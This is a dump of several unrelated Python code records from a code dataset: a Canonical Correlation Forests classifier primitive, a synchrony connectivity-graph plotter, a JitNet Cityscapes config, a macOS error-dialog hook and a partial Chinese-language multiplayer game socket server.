variance) of the data is less than this tolerance times the mse of the full data set.\",\n semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter']\n )\n maxDepthSplit = hyperparams.Hyperparameter[str](\n default='stack',\n description=\"Maximum depth of a node when splitting is still allowed. When set to 'stack' this is set to the maximum value that prevents crashes (usually ~500 which should never really be reached in sensible scenarios)\",\n semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter']\n )\n XVariationTol = hyperparams.Hyperparameter[float](\n default=1.0e-10,\n description=\"Points closer than this tolerance (after scaling the data to unit standard deviation) are considered the same the avoid splitting on numerical error. Rare would want to change.\",\n semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter']\n )\n # Options that may want to be set if using algorithms building on CCFs\n RotForM = hyperparams.Hyperparameter[int](\n default=3,\n description=\"Size of feature subsets taken for each rotation. Default as per WEKA and rotation forest paper\",\n semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter']\n )\n RotForpS = hyperparams.Hyperparameter[float](\n default=0.7500,\n description=\"Proportion of points to subsample for calculating each PCA projection. Default as per WEKA but not rotation forest paper\",\n semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter']\n )\n RotForpClassLeaveOut = hyperparams.Hyperparameter[float](\n default=0.5000,\n description=\"Proportion of classes to randomly eliminate for each PCA projection.\",\n semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter']\n )\n # Properties that can be set but should generally be avoided, using Default works best in most cases.\n minPointsForSplit = hyperparams.Hyperparameter[int](\n default=2,\n description=\"Minimum points for parent node\",\n semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter']\n )\n dirIfEqual = hyperparams.Enumeration[str](\n values=['first', 'rand'],\n default='first',\n description=\" When multiple projection vectors can give equivalent split criterion scores, one can either choose which to use randomly ('rand') or take the first ('first') on the basis that the components are in decreasing order of correlation for CCA.\",\n semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter']\n )\n bContinueProjBootDegenerate = hyperparams.UniformBool(\n default=True,\n description=\"In the scenario where the projection bootstrap makes the local data pure or have no X variation, the algorithm can either set the node to be a leaf or resort to using the original data for the CCA\",\n semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter']\n )\n multiTaskGainCombination = hyperparams.Enumeration[str](\n values=['mean', 'max'],\n default='mean',\n description=\"Method for combining multiple gain metrics in multi-output tasks. 
Valid options are 'mean' (default) - average of the gains which for all the considered metrics is equal to the joint gain, or the 'max' gain on any of the tasks.\",\n semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter']\n )\n missingValuesMethod = hyperparams.Enumeration[str](\n values=['mean', 'random'],\n default='mean',\n description=\"Method for dealing with missing values.\",\n semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter']\n )\n bUseOutputComponentsMSE = hyperparams.UniformBool(\n default=False,\n description=\"If true, doing regression with multiple outputs and doing CCA projections.\",\n semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter']\n )\n # Options that allow nonlinear features to be included in the CCA\n # in accordance with Lopez-Paz's randomized kernel cca.\n bRCCA = hyperparams.UniformBool(\n default=False,\n description=\"Options that allow nonlinear features to be included in the CCA.\",\n semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter']\n )\n rccaLengthScale = hyperparams.Hyperparameter[float](\n default=0.1000,\n description=\"Parameter for bRCCA, if set to True.\",\n semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter']\n )\n rccaNFeatures = hyperparams.Hyperparameter[int](\n default=50,\n description=\"Parameter for bRCCA, if set to True.\",\n semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter']\n )\n rccaRegLambda = hyperparams.Hyperparameter[float](\n default=1.0e-03,\n description=\"Parameter for bRCCA, if set to True.\",\n semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter']\n )\n rccaIncludeOriginal = hyperparams.UniformBool(\n default=False,\n description=\"Parameter for bRCCA, if set to True.\",\n semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter']\n )\n # Inputs and outputs HyperParams\n use_inputs_columns = hyperparams.Set(\n elements=hyperparams.Hyperparameter[int](-1),\n default=(),\n semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter'],\n description=\"A set of inputs column indices to force primitive to operate on. If any specified column cannot be used, it is skipped.\",\n )\n exclude_inputs_columns = hyperparams.Set(\n elements=hyperparams.Hyperparameter[int](-1),\n default=(),\n semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter'],\n description=\"A set of inputs column indices to not operate on. Applicable only if \\\"use_columns\\\" is not provided.\",\n )\n use_outputs_columns = hyperparams.Set(\n elements=hyperparams.Hyperparameter[int](-1),\n default=(),\n semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter'],\n description=\"A set of outputs column indices to force primitive to operate on. If any specified column cannot be used, it is skipped.\",\n )\n exclude_outputs_columns = hyperparams.Set(\n elements=hyperparams.Hyperparameter[int](-1),\n default=(),\n semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter'],\n description=\"A set of outputs column indices to not operate on. 
Applicable only if \\\"use_columns\\\" is not provided.\",\n )\n return_result = hyperparams.Enumeration(\n values=['append', 'replace', 'new'],\n default='append', # Default value depends on the nature of the primitive.\n semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter'],\n description=\"Should resulting columns be appended, should they replace original columns, or should only resulting columns be returned?\",\n )\n add_index_columns = hyperparams.UniformBool(\n default=True,\n semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter'],\n description=\"Also include primary index columns if input data has them. Applicable only if \\\"return_result\\\" is set to \\\"new\\\".\",\n )\n error_on_no_columns = hyperparams.UniformBool(\n default=True,\n semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter'],\n description=\"Throw an exception if no column is selected/provided. Otherwise issue a warning.\",\n )\n\n\nclass CanonicalCorrelationForestsClassifierPrimitive(SupervisedLearnerPrimitiveBase[Inputs, Outputs, Params, Hyperparams]):\n \"\"\"\n Canonical Correlation Forests Classifier is a decision tree ensemble method. CCFs naturally\n accommodate multiple outputs, provide a similar computational complexity to random forests,\n and inherit their impressive robustness to the choice of input parameters.\n It uses semantic types to determine which columns to operate on.\n Citation: https://arxiv.org/abs/1507.05444\n -------------\n Inputs: DataFrame of features of shape: NxM, where N = samples and M = features.\n Outputs: DataFrame containing the target column of shape Nx1\n -------------\n \"\"\"\n # Metadata\n __author__ = 'UBC DARPA D3M Team, Tony Joseph '\n metadata = metadata_base.PrimitiveMetadata({\n \"id\": \"28e8840d-7794-40d2-b5d6-c9e136a6e51e\",\n \"version\": config.VERSION,\n \"name\": \"Canonical Correlation Forests Classifier\",\n \"description\": \"A decision tree ensemble primitive like random forests\",\n \"python_path\": \"d3m.primitives.classification.canonical_correlation_forests.UBC\",\n \"primitive_family\": metadata_base.PrimitiveFamily.CLASSIFICATION,\n \"algorithm_types\": [metadata_base.PrimitiveAlgorithmType.DECISION_TREE,\\\n metadata_base.PrimitiveAlgorithmType.ENSEMBLE_LEARNING,\\\n metadata_base.PrimitiveAlgorithmType.CANONICAL_CORRELATION_ANALYSIS,],\n \"source\": {\n \"name\": config.D3M_PERFORMER_TEAM,\n \"contact\": config.D3M_CONTACT,\n \"uris\": [config.REPOSITORY],\n },\n \"keywords\": ['canonical correlation forests', 'tree ensemble method', 'decision tree'],\n \"installation\": [config.INSTALLATION],\n \"hyperparams_to_tune\": ['nTrees', 'splitCriterion']\n })\n\n\n def __init__(self, *, hyperparams: Hyperparams, random_seed: int = 0, _verbose: int = 0) -> None:\n super().__init__(hyperparams=hyperparams, random_seed=random_seed)\n self.hyperparams = hyperparams\n self._random_state = random_seed\n self._verbose = _verbose\n self._training_inputs: Inputs = None\n self._training_outputs: Outputs = None\n self._CCF = {}\n self._label_name_columns = None\n # Is the model fit on the training data\n self._fitted = False\n\n\n def set_training_data(self, *, inputs: Inputs, outputs: Outputs) -> None:\n self._training_inputs = inputs\n self._training_outputs = outputs\n self._new_training_data = True\n self._fitted = False\n\n\n def _create_learner_param(self) -> None:\n # Setup HyperParams\n self.optionsClassCCF = {}\n self.optionsClassCCF['nTrees'] = 
self.hyperparams['nTrees']\n self.optionsClassCCF['parallelprocessing'] = self.hyperparams['parallelprocessing']\n self.optionsClassCCF['lambda'] = self.hyperparams['lambda_']\n self.optionsClassCCF['splitCriterion'] = self.hyperparams['splitCriterion']\n self.optionsClassCCF['minPointsLeaf'] = self.hyperparams['minPointsLeaf']\n self.optionsClassCCF['bSepPred'] = self.hyperparams['bSepPred']\n self.optionsClassCCF['taskWeights'] = self.hyperparams['taskWeights']\n self.optionsClassCCF['bProjBoot'] = self.hyperparams['bProjBoot']\n self.optionsClassCCF['bBagTrees'] = self.hyperparams['bBagTrees']\n self.optionsClassCCF['projections'] = self.hyperparams['projections']\n self.optionsClassCCF['treeRotation'] = self.hyperparams['treeRotation']\n self.optionsClassCCF['propTrain'] = self.hyperparams['propTrain']\n self.optionsClassCCF['epsilonCCA'] = self.hyperparams['epsilonCCA']\n self.optionsClassCCF['mseErrorTolerance'] = self.hyperparams['mseErrorTolerance']\n self.optionsClassCCF['maxDepthSplit'] = self.hyperparams['maxDepthSplit']\n self.optionsClassCCF['XVariationTol'] = self.hyperparams['XVariationTol']\n self.optionsClassCCF['RotForM'] = self.hyperparams['RotForM']\n self.optionsClassCCF['RotForpS'] = self.hyperparams['RotForpS']\n self.optionsClassCCF['RotForpClassLeaveOut'] = self.hyperparams['RotForpClassLeaveOut']\n self.optionsClassCCF['minPointsForSplit'] = self.hyperparams['minPointsForSplit']\n self.optionsClassCCF['dirIfEqual'] = self.hyperparams['dirIfEqual']\n self.optionsClassCCF['bContinueProjBootDegenerate'] = self.hyperparams['bContinueProjBootDegenerate']\n self.optionsClassCCF['multiTaskGainCombination'] = self.hyperparams['multiTaskGainCombination']\n self.optionsClassCCF['missingValuesMethod'] = self.hyperparams['missingValuesMethod']\n self.optionsClassCCF['bUseOutputComponentsMSE'] = self.hyperparams['bUseOutputComponentsMSE']\n self.optionsClassCCF['bRCCA'] = self.hyperparams['bRCCA']\n self.optionsClassCCF['rccaLengthScale'] = self.hyperparams['rccaLengthScale']\n self.optionsClassCCF['rccaNFeatures'] = self.hyperparams['rccaNFeatures']\n self.optionsClassCCF['rccaRegLambda'] = self.hyperparams['rccaRegLambda']\n self.optionsClassCCF['rccaIncludeOriginal'] = self.hyperparams['rccaIncludeOriginal']\n self.optionsClassCCF['classNames'] = np.array([])\n self.optionsClassCCF['org_muY'] = np.array([])\n self.optionsClassCCF['org_stdY'] = np.array([])\n self.optionsClassCCF['mseTotal'] = np.array([])\n\n\n def fit(self, *, timeout: float = None, iterations: int = None) -> CallResult[None]:\n if self._fitted:\n return CallResult(None)\n\n if self._training_inputs is None or self._training_outputs is None:\n raise exceptions.InvalidStateError(\"Missing training data.\")\n self._new_training_data = False\n\n XTrain, _ = self._select_inputs_columns(self._training_inputs)\n YTrain, _ = self._select_outputs_columns(self._training_outputs)\n \n self._create_learner_param()\n self._store_columns_metadata_and_names(XTrain, YTrain)\n\n # Fit data\n CCF = genCCF(XTrain, YTrain, nTrees=self.optionsClassCCF['nTrees'], optionsFor=self.optionsClassCCF, do_parallel=self.optionsClassCCF['parallelprocessing'])\n\n self._CCF = CCF\n self._fitted = True\n\n return CallResult(None)\n\n\n def produce(self, *, inputs: Inputs, timeout: float = None, iterations: int = None) -> CallResult[Outputs]:\n \"\"\"\n Inputs: DataFrame of features\n Returns: Pandas DataFrame Containing predictions\n \"\"\"\n # Inference\n if not self._fitted:\n raise PrimitiveNotFittedError(\"Primitive not 
fitted.\")\n\n XTest, columns_to_use = self._select_inputs_columns(inputs)\n\n if len(XTest.columns):\n # Prediction\n YpredCCF, _, _ = predictFromCCF(self._CCF, XTest)\n\n output_columns = [self._wrap_predictions(YpredCCF)]\n\n outputs = base_utils.combine_columns(inputs, columns_to_use, output_columns, return_result=self.hyperparams['return_result'], add_index_columns=self.hyperparams['add_index_columns'])\n\n return base.CallResult(outputs)\n\n\n def get_params(self) -> Params:\n if not self._fitted:\n return Params(CCF_=None,\n attribute_columns_names=self._attribute_columns_names,\n target_columns_metadata=self._target_columns_metadata,\n target_columns_names=self._target_columns_names)\n\n return Params(CCF_=self._CCF,\n attribute_columns_names=self._attribute_columns_names,\n target_columns_metadata=self._target_columns_metadata,\n target_columns_names=self._target_columns_names)\n\n\n def set_params(self, *, params: Params) -> None:\n self._CCF = params['CCF_']\n self._attribute_columns_names = params['attribute_columns_names']\n self._target_columns_metadata = params['target_columns_metadata']\n self._target_columns_names = params['target_columns_names']\n self._fitted = True\n\n\n def __getstate__(self) -> dict:\n state = super().__getstate__()\n\n state['random_state'] = self._random_state\n\n return state\n\n\n def __setstate__(self, state: dict) -> None:\n super().__setstate__(state)\n\n self._random_state = state['random_state']\n\n\n def _update_predictions_metadata(self, outputs: Optional[Outputs], target_columns_metadata: List[OrderedDict]) -> metadata_base.DataMetadata:\n outputs_metadata = metadata_base.DataMetadata()\n if outputs is not None:\n outputs_metadata = outputs_metadata.generate(outputs)\n\n for column_index, column_metadata in enumerate(target_columns_metadata):\n outputs_metadata = outputs_metadata.update_column(column_index, column_metadata)\n\n return outputs_metadata\n\n\n def _wrap_predictions(self, predictions: np.ndarray) -> Outputs:\n outputs = container.DataFrame(predictions, generate_metadata=False)\n outputs.metadata = self._update_predictions_metadata(outputs, self._target_columns_metadata)\n outputs.columns = self._target_columns_names\n return outputs\n\n\n def _get_target_columns_metadata(self, outputs_metadata: metadata_base.DataMetadata) -> List[OrderedDict]:\n outputs_length = outputs_metadata.query((metadata_base.ALL_ELEMENTS,))['dimension']['length']\n\n target_columns_metadata: List[OrderedDict] = []\n for column_index in range(outputs_length):\n column_metadata = OrderedDict(outputs_metadata.query_column(column_index))\n\n # Update semantic types and prepare it for predicted targets.\n semantic_types = list(column_metadata.get('semantic_types', []))\n if 'https://metadata.datadrivendiscovery.org/types/PredictedTarget' not in semantic_types:\n semantic_types.append('https://metadata.datadrivendiscovery.org/types/PredictedTarget')\n semantic_types = [semantic_type for semantic_type in semantic_types if semantic_type != 'https://metadata.datadrivendiscovery.org/types/TrueTarget']\n column_metadata['semantic_types'] = semantic_types\n\n target_columns_metadata.append(column_metadata)\n\n return target_columns_metadata\n\n\n def _store_columns_metadata_and_names(self, inputs: Inputs, outputs: Outputs) -> None:\n _attribute_columns_names = list(inputs.columns)\n self._attribute_columns_names = [str(name) for name in _attribute_columns_names]\n self._target_columns_metadata = self._get_target_columns_metadata(outputs.metadata)\n 
self._target_columns_names = list(outputs.columns)\n\n\n def _can_use_inputs_column(self, inputs_metadata: metadata_base.DataMetadata, column_index: int) -> bool:\n column_metadata = inputs_metadata.query((metadata_base.ALL_ELEMENTS, column_index))\n\n return 'https://metadata.datadrivendiscovery.org/types/Attribute' in column_metadata.get('semantic_types', [])\n\n\n def _get_inputs_columns(self, inputs_metadata: metadata_base.DataMetadata) -> List[int]:\n def can_use_column(column_index: int) -> bool:\n return self._can_use_inputs_column(inputs_metadata, column_index)\n\n columns_to_use, columns_not_to_use = base_utils.get_columns_to_use(inputs_metadata, self.hyperparams['use_inputs_columns'],\\\n self.hyperparams['exclude_inputs_columns'], can_use_column)\n\n if not columns_to_use:\n if self.hyperparams['error_on_no_columns']:\n raise ValueError(\"No inputs columns.\")\n else:\n self.logger.warning(\"No inputs columns.\")\n\n if self.hyperparams['use_inputs_columns'] and columns_to_use and columns_not_to_use:\n self.logger.warning(\"Not all specified inputs columns can be used. Skipping columns: %(columns)s\", {\n 'columns': columns_not_to_use,\n })\n\n return columns_to_use\n\n\n def _can_use_outputs_column(self, outputs_metadata: metadata_base.DataMetadata, column_index: int) -> bool:\n column_metadata = outputs_metadata.query((metadata_base.ALL_ELEMENTS, column_index))\n\n return 'https://metadata.datadrivendiscovery.org/types/TrueTarget' in column_metadata.get('semantic_types', [])\n\n\n def _get_outputs_columns(self, outputs_metadata: metadata_base.DataMetadata) -> List[int]:\n def can_use_column(column_index: int) -> bool:\n return self._can_use_outputs_column(outputs_metadata, column_index)\n\n columns_to_use, columns_not_to_use = base_utils.get_columns_to_use(outputs_metadata, self.hyperparams['use_outputs_columns'], self.hyperparams['exclude_outputs_columns'], can_use_column)\n\n if not columns_to_use:\n if self.hyperparams['error_on_no_columns']:\n raise ValueError(\"No outputs columns.\")\n else:\n self.logger.warning(\"No outputs columns.\")\n\n if self.hyperparams['use_outputs_columns'] and columns_to_use and columns_not_to_use:\n self.logger.warning(\"Not all specified outputs columns can be used. 
Skipping columns: %(columns)s\", {\n 'columns': columns_not_to_use,\n })\n\n return columns_to_use\n\n\n def _select_inputs_columns(self, inputs: Inputs) -> Tuple[Inputs, List[int]]:\n columns_to_use = self._get_inputs_columns(inputs.metadata)\n\n return inputs.select_columns(columns_to_use, allow_empty_columns=True), columns_to_use\n\n\n def _select_outputs_columns(self, outputs: Outputs) -> Tuple[Outputs, List[int]]:\n columns_to_use = self._get_outputs_columns(outputs.metadata)\n\n return outputs.select_columns(columns_to_use, allow_empty_columns=True), columns_to_use\n","sub_path":"primitives_ubc/clfyCCFS/ccfsClfy.py","file_name":"ccfsClfy.py","file_ext":"py","file_size_in_byte":28553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"642770586","text":"import warnings\n#few warnings due to version mismatch for numpy,sklearn etc..\nwarnings.filterwarnings(\"ignore\")\nimport os\nimport matplotlib.pyplot as plt\nimport numpy as np\n#import pyspike as spk\nimport time\nimport csv\nimport pandas as pd\nfrom multiprocessing import Pool\nimport networkx as nx\n\n\ndef list_allCSV():\n\tfileNameArray = os.listdir('Hippocampal/')\n\tprint(fileNameArray)\n\treturn fileNameArray\n\ndef plotGraph(csvFile, counter):\n\t#open dataframe obtained from LocalisedSynchrony.py\n\t#df = pd.read_csv(\"synchronyDataframe.csv\")\n\tdf = pd.read_csv(csvFile)\n\tprint(df)\n\t#remove entries where synchrony values are zero\n\t#df = df[df.SyncVal != 0]\n\t#df = df[df.SyncVal > 0.5]\n\tprint(df)\n\n\t#create a list of channel number and its position in a grid\n\tchannel_num = []\n\tfor i in range(4096):\n\t\tchannel_num.append(i)\n\t#print(channel_num)\n\t#list of grid co-ordinates\n\tcoordinates = []\n\tx = 0\n\ty = 0\n\t\n\tfor x in range(64):\n\t\tfor y in range(64):\n\t\t\tcoordinates.append((y,x))\n\n\tG = nx.from_pandas_edgelist(df, 'Ch_A', 'Ch_B', 'SyncVal')\n\tedges,weights = zip(*nx.get_edge_attributes(G,'SyncVal').items())\n\t\t\n\t#pos = {0:(0,0),1:(0,1),2:(0,2),3:(0,4),4:(1,0),5:(1,1),6:(1,2),7:(1,3),8:(2,0),9:(2,1),10:(2,2),11:(2,3),12:(3,0),13:(3,1),14:(3,2),15:(3,3)}\n\tpos = dict(zip(channel_num,coordinates))\n\t\n\t#plot the network\n\tprint (\"Weights: {}\".format(weights))\n\tplt.title(\"Connectivity graph based on synchrony level(400-600ms)\")\n\tplt.xlabel(\"Channel(0-64)\")\n\tplt.ylabel(\"Channel(0-64)\")\n\tnx.draw(G,pos, with_labels=False, node_color = 'black', node_size = 1, edgelist = edges, edge_color = weights, \n\t\t\tlinewidths = 2, font_size = 6, grid = True, edge_cmap = plt.cm.jet)\n\t#nx.draw(G,pos, with_labels=False, node_color = 'blue', node_size = 10, linewidths = 1, font_size = 4,grid = True)\n\t\n\tplt.setp(plt.gca(), 'ylim', list(reversed(plt.getp(plt.gca(), 'ylim'))))\n\t\n\t\n\tplt.savefig(\"connectivity_Graph_5_{}.png\".format(counter)) #revoming the last 4 chars i.e. .csv\n\tplt.grid(True)\n\t#plt.show()\n\n'''\ndef main():\n\t\"\"\"\n\tUsing multiprocessing to generate images from the panda dataframe\n\t\"\"\n\tFileNameList = list_allCSV()\n\t#print(FileNameList[0][19:])\n\tFileNameList = [int(i) for i in FileNameList[i][:-3]]\n\t#FileNameList = FileNameList.sort()\n\tprint(FileNameList)\n\t#FileNameList[:-3].sort()\n\t\t#using 16 cores. based on how many cores you might have. 
change accordingly\n\t#p = Pool(16)\n\t#with Pool(10) as p: # My pc has 16 cores\n\t#p.map(plotGraph,FileNameList)\n\n\tcounter = 0\n\tfor i in range(len(FileNameList)):\n\t\t#print(\"fileName: {}\".format(FileNameList[i]))\n\t\t#plotGraph(FileNameList[i],counter)\n\t\tcounter = counter + 1\n'''\ndef singleTimeIntervalPlot():\n\t'''\n\tfor single interval plot. this allows to plot one file at a time\n\t'''\n\tcsvFile = '400.csv'\n\t\n\tplotGraph(csvFile, 400)\n\n\n\n\nif __name__ == '__main__':\n\t#main()\n\tsingleTimeIntervalPlot()","sub_path":"SynchronyMeasures/SynchronyDataframes/graph_Plot.py","file_name":"graph_Plot.py","file_ext":"py","file_size_in_byte":2826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"562412394","text":"\"\"\"\nMask R-CNN\nBase Configurations class.\n\nCopyright (c) 2017 Matterport, Inc.\nLicensed under the MIT License (see LICENSE for details)\nWritten by Waleed Abdulla\n\"\"\"\n\nimport math\nimport numpy as np\nimport os\n\n\n# Base Configuration Class\n# Don't use this class directly. Instead, sub-class it and override\n# the configurations you need to change.\n\nclass Config(object):\n    \"\"\"Base configuration class. For custom configurations, create a\n    sub-class that inherits from this one and override properties\n    that need to be changed.\n    \"\"\"\n    def __init__(self):\n        \"\"\"Set values of computed attributes.\"\"\"\n\n        # Name the configurations. For example, 'COCO', 'Experiment 3', ...etc.\n        # Useful if your code needs to do things differently depending on which\n        # experiment is running.\n        self.NAME = \"JITNET-CITYSCAPES\" # Override in sub-classes\n\n        self.DATASET_PATH = \"/SSD/video-online-lstm-pytorch/datasets/CITYSCAPES\"\n\n        # Path to pretrained model (no leading slash: os.path.join would\n        # otherwise discard os.getcwd() and return an absolute path)\n        self.PRETRAINED_MODEL_PATH = os.path.join(os.getcwd(), \"pretrained/jitnet_ctyscapes_best.pth\")\n\n        # NUMBER OF GPUs to use. For CPU use 0\n        self.GPU_COUNT = 2\n\n        # Number of images to train with on each GPU. A 12GB GPU can typically\n        # handle 2 images of 1024x1024px.\n        # Adjust based on your GPU memory and image sizes. Use the highest\n        # number that your GPU can handle for best performance.\n        self.IMAGES_PER_GPU = 8\n\n        # Number of classification classes (including background)\n        self.NUM_CLASSES = 256 # Override in sub-classes\n        self.VALID_NUM_CLASSES = 19\n\n        # Input image resizing\n        self.IMAGE_H_DIM = 256\n        self.IMAGE_W_DIM = 512\n\n        # Learning rate and momentum\n        # The Mask RCNN paper uses lr=0.02, but on TensorFlow it causes\n        # weights to explode. 
Likely due to differences in optimzer\n # implementation.\n self.LEARNING_RATE = 0.001\n self.LEARNING_MOMENTUM = 0.9\n\n # Weight decay regularization\n self.WEIGHT_DECAY = 0.0001\n\n # Effective batch size\n if self.GPU_COUNT > 0:\n self.BATCH_SIZE = self.IMAGES_PER_GPU * self.GPU_COUNT\n else:\n self.BATCH_SIZE = self.IMAGES_PER_GPU\n\n def display(self):\n \"\"\"Display Configuration values.\"\"\"\n print(\"\\nConfigurations:\")\n for a in dir(self):\n if not a.startswith(\"__\") and not callable(getattr(self, a)):\n print(\"{:30} {}\".format(a, getattr(self, a)))\n print(\"\\n\")\n\n\n\"\"\"TEST\nconfig = Config()\nprint(config.BATCH_SIZE)\nprint(config.GPU_COUNT)\n\"\"\"","sub_path":"config_jitnet_cityscapes.py","file_name":"config_jitnet_cityscapes.py","file_ext":"py","file_size_in_byte":2629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"485686143","text":"import traceback, subprocess, os.path\n\ndef mac_except_hook(*exc_info):\n fname = os.path.expanduser('~/Documents/musclex.error.log')\n with open(fname, 'a') as f:\n f.write(''.join(traceback.format_exception(*exc_info)))\n f.close()\n applescript = \"'\\\ntell app \\\"System Events\\\" to \\\ndisplay dialog \\\"Error details are written to the file: {}.\\\" \\\nwith title \\\"Error message\\\" \\\nwith icon caution \\\nbuttons {{\\\"OK\\\"}}'\".format(fname)\n # print(applescript)\n subprocess.Popen('osascript -e ' + applescript, shell=True)\n\nhandlers = {\n 'darwin': mac_except_hook\n}","sub_path":"musclex/utils/exception_handler.py","file_name":"exception_handler.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"223545238","text":"import socket\nimport json\nimport threading\nimport server.champion\nimport server.character\nimport random\n\n\nclass 基本信息:\n 版本 = 2.1\n 更新说明 = \\\n \"全新角色、全新卡牌、全新技能,2.1新版本等你探索!\\n\" \\\n \"请于 baisebaoma.github.io 查看卡牌说明。\"\n 新版本地址 = \"http://lol.qq.com\"\n # 也许用数会比字符串快一些?\n\n\ndef 接收消息(连接):\n # 输入连接,输出一个含有所有obj的list\n\n while True:\n 全缓存 = ''\n obj分割 = list()\n try:\n # 解决断包问题\n while True:\n 缓存 = 连接.recv(1024).decode()\n 全缓存 += 缓存\n if 缓存 == '' or 缓存[-1] == '}':\n break\n\n # 解决黏包问题\n 指针 = 0\n 全缓存分割 = list()\n while 指针 < len(全缓存) - 1:\n if 全缓存[指针] == \"}\" and 全缓存[指针 + 1] == \"{\":\n 全缓存分割.append(全缓存[0:指针 + 1]) # 注意:包括开头,不包括结尾!\n 全缓存 = 全缓存[指针 + 1:]\n 指针 = -1\n 指针 += 1\n 全缓存分割.append(全缓存)\n if 全缓存分割:\n for item in 全缓存分割:\n obj分割.append(json.loads(item))\n 全缓存分割.clear()\n return obj分割\n else:\n obj = json.loads(全缓存)\n return list(obj)\n except OSError:\n print(f\"{连接.getpeername()} 的连接已断开。\")\n return\n # except OSError:\n except json.decoder.JSONDecodeError:\n if 全缓存 == '':\n print('\\n可能是客户端关闭或BUG,无法接收信息。')\n return\n else:\n print(f'\\n{全缓存}\\n')\n print('可能是黏包问题,解码失败,无法显示这句话。')\n return\n\n\ndef 用户线程(连接):\n 消息列表 = 接收消息(连接)\n # 检查版本号\n if 消息列表[0]['对象'] != 基本信息.版本: # 用【对象】存储版本号\n print(f\"尝试登录的用户({连接.getpeername()})的版本过低。已发送提示更新版本的消息。\")\n 连接.send(json.dumps(\n {\n '用户': '系统',\n '行为': '拒绝登录:版本',\n '对象': [基本信息.新版本地址, 基本信息.更新说明]\n }\n ).encode())\n # 用【对象】存储新版本地址\n if 消息列表[1:]:\n for 消息 in 消息列表[1:]:\n 处理消息(消息, 连接)\n else:\n print(f\"尝试登录的用户({连接.getpeername()})的版本正确。\")\n 连接.send(json.dumps(\n {\n '用户': '系统',\n '行为': '版本正确',\n '对象': 0\n }\n ).encode())\n\n while True:\n 消息列表 = 接收消息(连接)\n if 消息列表:\n for 消息 in 消息列表:\n 处理消息(消息, 连接)\n else:\n connection_to_be_removed = 玩家控制.搜索连接(连接)\n if connection_to_be_removed is not False:\n 
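# drop the disconnected player from the lobby so later broadcasts skip the dead socket\n                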
玩家控制.玩家列表.remove(connection_to_be_removed)\n 连接.close()\n return False\n\n\ndef 处理消息(消息, 连接):\n # 它只能处理单条消息\n print(f\"来自 {连接.getpeername()} 的消息:{消息}\")\n if 消息['行为'] == '登录':\n\n \"\"\"\n if 消息['用户名'] == '系统': # 这个应该在客户端那边写\n print(\"不能选择“系统”为用户名,因为它在服务器内部已经使用。请重试。\")\n return\n \"\"\"\n\n '''\n # 检查版本号\n # 已经放在前面了\n if 消息['对象'] != 基本信息.版本: # 用【对象】存储版本号\n print(f\"尝试登录的用户({连接.getpeername()})的版本过低。已发送提示更新版本的消息。\")\n 连接.send(json.dumps(\n {\n '用户': '系统',\n '行为': '拒绝登录:版本',\n '对象': 基本信息.新版本地址\n }\n ).encode())\n # 用【对象】存储新版本地址\n return\n '''\n\n # 检查是否重名\n for 对象 in 玩家控制.玩家列表:\n if 对象.用户名 == 消息['用户']:\n print(f\"尝试登录的用户({连接.getpeername()})选择了一个和已存在用户相同的用户名。请重试。\")\n 连接.send(json.dumps(\n {\n '用户': '系统',\n '行为': '拒绝登录:重名',\n }\n ).encode())\n return\n\n # 以上两个都过了,那么这个玩家应该没问题(还没有写反攻击机制),先加入列表\n 玩家控制.玩家列表.append(玩家(用户名=消息['用户'], 连接=连接))\n\n # 然后发送登录成功的消息(因为这样方便一些)\n 玩家控制.私发(消息['用户'], 用户='系统', 行为=f\"成功登录\")\n\n # 给这个登录的人发送当前的玩家列表\n for 对象 in 玩家控制.玩家列表:\n 玩家控制.私发(消息['用户'], 用户=对象.用户名, 行为='登录')\n\n # 给这个登录的人发送玩家是否准备\n for 对象 in 玩家控制.玩家列表:\n if 对象.准备 is True:\n 玩家控制.广播(用户=对象.用户名, 行为='准备')\n\n # 这件事应该客户端来做\n # 给这个登录的人发送控制消息(准备)\n # 玩家控制.控制(消息['用户名'], 列表=[\"准备\"])\n\n # 给其他的人发送这个人连接的消息\n for 对象 in 玩家控制.玩家列表:\n if 对象.用户名 != 消息['用户']:\n 对象.发送(用户=消息['用户'], 行为='登录')\n\n elif 消息['行为'] == '准备':\n 玩家控制.搜索(消息['用户']).准备 = True\n print(f\"{消息['用户']} 已准备\")\n 玩家控制.广播(用户=消息['用户'], 行为='准备')\n # 下面这些事都应该客户端做\n # 玩家控制.广播(类型='广播', 消息=f\"{消息['用户名']} 已准备!\")\n # 玩家控制.控制(消息['用户名'], 列表=[\"disable\"])\n # 玩家控制.控制(消息['用户名'], 列表=[\"已准备,正在等待所有玩家准备\"])\n 全玩家准备 = True\n for 对象 in 玩家控制.玩家列表:\n if 对象.准备 is False:\n 全玩家准备 = False\n break\n if 全玩家准备 and len(玩家控制.玩家列表) >= 2: 